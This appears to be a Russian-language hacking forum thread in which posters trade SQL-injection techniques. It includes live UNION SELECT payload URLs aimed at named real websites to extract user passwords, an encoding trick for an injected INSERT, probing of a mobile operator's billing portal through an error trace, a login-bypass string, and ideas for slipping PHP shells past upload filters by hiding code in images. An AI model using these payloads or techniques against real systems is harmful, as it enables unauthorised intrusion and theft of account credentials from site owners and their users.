Есть иньекция. Таблицы login and pass я вытащил успешно. Таблица users Но при попытке вытащить данные логина и пароля - белый экран или ошибка. Как обходится этот баг? _brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+users-- - белый экран _brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+Users-- - ошибка
Не хочет в базу писать русские символы. Это инъекция, так что запрос только такой. INSERT _cat SET category='0' а дальше можно дописывать Code: INSERT _cat SET category='0', 2_category='0', name_cat='Русский', en_name_cat='sd', description='', sort_index='0' есть какие то варианты туда их запихнуть всетаки)? Проблему решил! name_cat=CHAR(0xF6F3E0F6F3E0 USING cp1251)
хз, подстава какая-то: Code: http://www.materinstvo.ru/art/4610' http://materinstvo.ru/?module=articles&id=4610'
exception 'ZSecurityException' with message 'Not enough privileges! ' in /opt/appl/ecare/4.0.0_042/public/specific/ZEcareBusinessLogic.php:136 Stack trace: #0 /opt/appl/ecare/4.0.0_042/public/specific/BusinessLogic/GetUnbilledCallsBLHelper.php(55): ZEcareBusinessLogic->validateAllowedMsisdnId(''1' '2'') #1 /opt/appl/ecare/4.0.0_042/ext/Common/ZBusinessLogic.php(58): GetUnbilledCallsBLHelper->checkPrivileges() #2 /opt/appl/ecare/4.0.0_042/public/requests/listUnbilledCalls.php(21): ZBusinessLogic->execute(Array) #3 /opt/appl/ecare/4.0.0_042/public/index.php(56): include_once('/opt/appl/ecare...') #4 {main} парни при токой ошибке можно чтото намутить? это от моей мобильной телефонной компании
как узнать путь до директории сайта на сервере, пути раскрыть короче ?! через текст ошибки в пхп скрипте не получилось...
1)найти раскрытие в скрипте 2)попробывать найти логи, конфиги а в них пути (список путей к ним здесь ) 3)попробывать найти в кеше поисковиков/веб архиве 4)побегать с бубном и угадать
Помогите плиз! Бред какойто... тренируюсь в скулях. Вот мой код PHP: if(isset($_POST['login']) && isset($_POST['password'])) { $login=$_POST['login']; $password=md5($_POST['password']); $query="SELECT * FROM users WHERE login='$login' AND password='$password' LIMIT 1"; echo $query; $response=mysql_query($query); $result=mysql_fetch_array($response); if($login==$result['login'] && $password==$result['password']) $_SESSION['id']=$result['id']; } if(!isset($_SESSION['id'])) { echo " <form method=post> <table> <tr><td>Логин:</td><td><input type=text name=login></td></tr> <tr><td>Пароль:</td><td><input type=text name=password></td></tr> <tr><td><input type=submit name=submit value=Вход></td></tr> </table>"; exit; } таблица users: id | login | password 1 | admin | md5passs я подставляю в форму логин: admin'; -- пароль: bla bla bla сделал в сурипте отладочный вывод заппроса PHP: SELECT * FROM users WHERE login='admin'; --' AND password='698d51a19d8a121ce581499d7b701668' LIMIT 1 но нифига не заходит, пишет Warning: mysql_fetch_array(): supplied argument is not a valid MySQL........
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '36eba1e1e343279857ea7f69a597324e' LIMIT 1' at line 1 помогите ктонить знающий в чём трабла? UPD: зашло двое мемберов и хер кто ответил...
Есть какая-нибудь функция для определения текущей базы без скобок??? Всё кроме неё нашёл, мб кому-то и пригодится user(), current_user(), system_user(), session_user() = current_user version() = @@version ось я только как без скобок знаю @@version_compile_os А вот database() =???
можно так: SELECT schema_name FROM information_schema.schemata limit 0,1 SELECT schema_name FROM information_schema.schemata limit 1,1 ..... не текущая, но все узнаешь, в принципе относительно по барабану, какая текущая, очень много вкусного бывает и в остальных
как можно обойти фильтрацию загружаемого файла в админке ?! по сути можно загружать "все файлы", но при заливке пхп-скрипта вылезает ошибка...что можно в таких случаях сделать ?
тоже нет... может я бред говорю но нельзя ли сделать что-то вроде этого т.е. к картинке приписать захексенный вредоносный код. не прокатит ?
